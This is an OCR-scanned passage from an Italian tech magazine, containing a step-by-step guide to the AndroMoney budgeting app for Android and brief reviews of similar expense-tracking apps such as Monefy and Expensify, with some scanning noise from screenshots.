re Assistant fornendo alcuni permessi (ad esempio, la 
possibilità di condividere con Google la nostra posizio- 
ne ci aiuta a trovare facilmente ristoranti, hotel o, più 
banalmente, sapere sempre dove abbiamo parcheggia- 
to l'auto). A questo punto potremo iniziare a interagire 
col nostro nuovo assistente parlando però in lingua 
inglese. Potremo chiedergli di tutto: lui apprenderà col 
tempo e darà risposte sempre più vicine a quello che ci 
interessa. » 


ECCO L'ASSISTENTE! 


VOCE 
0ecse 
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SPESE SOTTO 
CONTROLLO 


Sfrutta lo smartphone o il tablet per gestire il tuo budget di spesa e arrivare 


alla fine del mese senza sforare 


on è ancora la fine del mese e abbiamo già consumato tut- 

to lo stipendio? Un problema che può capitare a tutti. Sta- 

re dietro a tutte le spese è quasi impossibile e basta un im- 
previsto per far saltare i conti. Magari avevamo programmato un 
week-end e dobbiamo rinunciarci perché il conto è andato in ros- 
so, oppure dobbiamo rimandare l’acquisto del nuovo smartphone 
perché non siamo riusciti a mettere da parte la somma necessaria. 
Per evitare di trovarci in situazioni del genere, abbiamo scovato sul 
Play Store un’interessantissima applicazione, AndroMoney, che ci 
aiuta nella gestione del bilancio personale. Con questa app diventa 
semplice tenere traccia di ogni spesa, anche quelle di pochi centesimi 


SIOTIRONTARFSTANOZIZEZZ INN THREE ATTRAE 
3 


A PORTATA DI TOCCO 
0 Toccando il menu in alto 0 
a sinistra scegliamo la 
visualizzazione per giorno, setti- 
mana, mese o anno. Inizialmente, ci 
troveremo di fronte una schermata 
vuota da compilare con le nostre 
spese ed entrate. da aggiungere. 
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2016-12-17 (Sab) > | 


AM11:31 ot Shit 
Clothing/Beauty - abito atei Mie i” 
le] = « O 
Education possi sò O 

Entertainment Sa IS 
it 


NUOVO MOVIMENTO 
Per inserire un nuovo 
record tocchiamo Nuovo. 
Dal pannello in alto scegliamo se 

si tratta di un'uscita o un'entrata. 
Selezioniamo la valuta e servendoci 
della tastiera inseriamo la somma 


come un caffè al bar, perché anche quei pochi centesimi alla fine del 
mese potrebbero pesare molto. 


NON PERDI UN CENTESIMO 


Grazie all’app è possibile tenere traccia delle spese e delle entrate, evi- 
tando il rischio di sforare il budget a nostra disposizione. Non occorre 
ricevute: basta inserire la spesa nell’app e 
in qualsiasi momento avremo un quadro complessivo della situazione 
economica. Usarla è davvero molto semplice e nei passi seguenti ve- 
dremo come inserire le varie spese e gestire le nostre finanze. 


più conservare scontrini e 


TUTTI | DETTAGLI 

Tocchiamo Categoria per 

indicare il tipo di spesa che 
stiamo inserendo. Se non dovesse 
essere presente la categoria che ci 
serve, basta premere Aggiungi per 
inserirla manualmente indicando 
nome e scegliendo un'icona. 


La 


A n d 


r 


o i d c 0 


Gestiamo il conto corrente 


Con pochi tocchi avremo una dettagliata lista movimenti sempre a portata di mano 


Periodico 


@ Una volta © Periodico 


RES TIZIA a UR 


< » 
A SRSEE ENO 


w 


Annulla Uni 


far Avvisa quando si supera il 50% del 


Gestione Budget 

Gestisci ll uo budget con questo utile t00f 
Feedback Vibrazione 

Vibra all'inserimento di dati 
Calcolatrice 

Mostra automaticamente ia calcolatrice 
Conferma l'uscita 

Vuol confermare per uscire? 
Anteprima 

Anteprima records periodici 

Conto 

Includi | futuri records nel totale del conto 


RR R N 


QUALE 

PAGAMENTO? 

Scelta la cate- 
goria, tocchiamo Conto 
per indicare se si tratta di 
un pagamento in contan- 
ti, con carta di credito o 
bancario. Aggiungiamo un 
beneficiario, impostiamo 
una periodicità se si tratta 
di una spesa ricorrente e 
aggiungiamo le note espli- 
cative. Al termine tocchia- 
mo Salva per completare. 


ALLARME 
03 supcet 

Toccando l'icona 
in alto a sinistra dell’inter- 
faccia grafica dell'app si 
accede al menu principale 
da cui possiamo gestire 
il nostro conto e il budget 
da mettere a disposizione. 
Possiamo, ad esempio, 
impostare un allarme per 
avvisarci quando abbiamo 
superato di una certa so- 
glia il budget che ci siamo 
prefissati di spendere 
settimanalmente. 


APP 
05 sumisura 

Spostandoci 
nelmenu Impostazioni 
possiamo personalizzare 
diversi aspetti dell'app 
AndroMoney in modo 
da adattarla alle nostre 
necessità e renderla più 
fruibile. Possiamo ad 
esempio modificare il for- 
mato della data, il colore 
del raccoglitore, lo stile 
della tastiera, il tipo di 
ordinamento per i record 
e molto altro ancora. 


Filtri 


B cono 


Gestione Budget 
Gestisci il tuo budget con questo L 


Feedback Vibrazione 
Vibra all'inserimento di dati 


Calcolatrice 
Mostra automaticamente la calcoli 


Conferma l'uscita 
Vuoi confermare per uscire? 


Anteprima 


Amtamelmea rammodto masfosiiat 


USIAMO 

I FILTRI 

Col tempo le 
spese e le entrate diven- 
teranno numerose. Oltre a 
visualizzarne l'elenco com- 
pleto, AndroMoney con- 
sente di filtrare i record in 
base al tipo. Basta toccare 
il tasto con i tre punti in 
alto e scegliere Filtri. È 
anche possibile richiamare 
il calendario per avere un 
prospetto generale. 


ECCO 
I GRAFICI 


Dalla sezione 
Report dell'applicazione, 
possiamo visualizzare l'an- 
damento delle nostre spese 
attraverso grafici a Torta, 
a Tendenza o a Barre. Una 
funzionalità, questa, che ci 
aiuta a comprendere meglio 
la situazione finanziaria, 
avendo subito un riscontro 
visivo. Una volta scelto il tipo 
di grafico, si può specificare 
il periodo di riferimento e la 
tipologia di spesa. 


DATI 
068 sincroniZzaTI 
Possiamo instal- 
lare AndroMoney su più 
dispositivi e sincronizzare 
i dati per avere sempre a 
portata di mano il nostro 
conto personale: molto uti- 
le nel caso in cui disponia- 
mo di più smartphone. Da 
Impostazioni scorriamo la 
finestra e spuntiamo Data- 
base di sync. Sarà neces- 
sario eseguire l'accesso 
su tutti i dispositivi con lo 
stesso account Google. 


MONEFY - MONEY MANAGER 


< (nt Flonafi 


i 
=> sommario Î@ 


Biancio Corrente: 27.757 01 
Questo Saida Mese: (100.00) 
Questa Settenana Entrata: 0.00 
Questo Entrata Mese: 7.20 
Da Inizio Anno Entrata: 11,344.00 


dò Oggi Spese: 0.00 


Questa Settimana Spese: 100.00 
Spera Mese Attuaie 100.00 


Spesa da inizio Anne: 51,253.35 


Monefy permette di gestire le 
proprie spese e sincronizzarle 
usando Dropbox. Ha un'in- 
terfaccia moderna e usarla 

è semplicissimo: sì possono 
aggiungere contî e carte, 
personalizzare le categorie 

di spesa, definire un budget 
mensile e proteggerla con una 
password. La versione gratuita 
offre tutte le funzioni della 
Pro, ma comporta la visualiz- 
zazione di un po’ dì pubblicità 
di tanto in tanto. 


| Ottima applicazione, comple- 
È taintutte le sue funzionalità 


e con in più qualche utile 


. tool. Un esempio? Include un 
. convertitore di valuta, un cal- 


colatore per i prestiti e altro 


| ancora. Si possono creare 


più account per ogni mem- 
bro della famiglia. Presente 
anche un widget per la Home 
dello smartphone. Permette 
di scattare foto di scontrini e 
altre ricevute per archiviarli 


| nell'applicazione. 


RI suli & BILANCIO 


74 @® Linux Magazine 


Ottima app per gestire le 
spese e risparmiare preziosi 
soldi. Disponibite per ogni 
piattaforma mobile fottre 

ad Android, anche î0S e 
Windows Phone}, permette 
di gestire it proprio budget 
mensile, visualizzare le 
transizioni per graficì, essere 
avvisati via e-mail delle sca- 
denze, allegare file alle spe- 
se e altro ancora. È possibile 
sincronizzare i dati via Web 
stt web.mobilisapp.com. 


EXPENSIFY 


Si tratta di una delle più vali- 
de alternative a AndroMoney. 
Fa quello che promette: con- 
sente di controllare il budget 
di spesa mensile e impo- 
stare le uscite ricorrenti. | 
dati vengono sincronizzati 
attraverso i vari dispositivi e 
possono anche essere gestiti 
via Web. Offre inoltre il sup- 
porto per l'esportazione dei 
dati nel formato CSV in modo 
che possano essere analizza- 
ti anche sul PC. 


Molto utilizzata dagli uomini 
d'affari più tecnologici per 
gestire le proprie note spese 
con l'azienda. Grazie alta 
funzione SmartScan è infatti 
possibile importare i dati di 
una spesa semplicemente 
fotografando lo scontrino con 
la fotocamera dello smart- 
phone o del tablet Android, 
Offre anche l'applicazione 
Web {dunque è mutti-piat- 
taforma] e la possibilità di 
împortare le carte dì credito. 


SPESE GIORNALIERE 3 


. Realizzata col Material De- 
| sign, questa app si fa subito 


apprezzare per la grafica 


moderna della sua interfac- 

N cia. Si possono inserire fa- 

3 cilmente le spese quotidiane 
| e avere sempre un controllo 


completo sui movimenti di 


N cassa, sul budget a disposi- 
N zionee creare report grafici. 
î Offre, inoltre, la possibilità di 


proteggere l'accesso ai dati 


Î conuna chiave di sicurezza 


e di farne un backup. 


